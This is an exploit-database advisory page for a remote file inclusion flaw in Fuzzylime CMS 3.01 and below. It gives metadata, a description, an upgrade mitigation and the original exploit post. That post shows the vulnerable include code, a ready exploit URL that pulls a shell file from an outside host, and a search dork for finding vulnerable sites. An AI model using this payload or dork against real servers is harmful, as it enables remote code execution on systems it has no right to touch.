Fuzzylime CMS - exploit.company

vendor:

Fuzzylime CMS

by:

irk4z

7.5

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: Fuzzylime CMS

Affected Version From: 3.01 and below

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: a:fuzzylime:fuzzylime_cms

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Fuzzylime CMS <= 3.01 Remote File Inclusion Vulnerability

Fuzzylime CMS version 3.01 and below is vulnerable to a Remote File Inclusion vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'admindir' parameter of the 'display.php' script. An attacker can exploit this vulnerability to include arbitrary remote files, allowing for the execution of arbitrary PHP code. The attacker can also gain access to the web server process user privileges.

Mitigation:

Upgrade to the latest version of Fuzzylime CMS, which is not vulnerable to this issue.

Source

Exploit-DB raw data:

.-----------------------------------------------------------------------------.
|  vuln.: fuzzylime cms <= 3.01 Remote File Inclusion Vulnerability           |
|  download: http://cms.fuzzylime.co.uk/                                      |
|  dork: "powered by fuzzylime"                                               |
|                                                                             |
|  author: irk4z@yahoo.pl                                                     |
|  homepage: http://irk4z.wordpress.com/                                      |
|                                                                             |
|  greets to: cOndemned, str0ke, wacky                                        |
'-----------------------------------------------------------------------------'

# code:

  /code/display.php:
  ... 
1    <?
2    $s = $_GET[s];
3    $p = $_GET[p];
4    $s = str_replace("../", "", $s);
5    $p = str_replace("../", "", $p);
6    if(empty($s)) $s = "front";
7    if(empty($p)) $p = "index";
8    $curs = $s;
9    $curp = $p;
10
11   include "code/settings.inc.php";
12   include "${admindir}/languages/english.inc.php";
 ...

 line 11: ./code/code/settings.inc.php not exists so $admindir is empty :D:D
 
# exploit: 
 
 http://[HOST]/[PATH]/code/display.php?admindir=http://host/shell.txt?

# milw0rm.com [2008-03-14]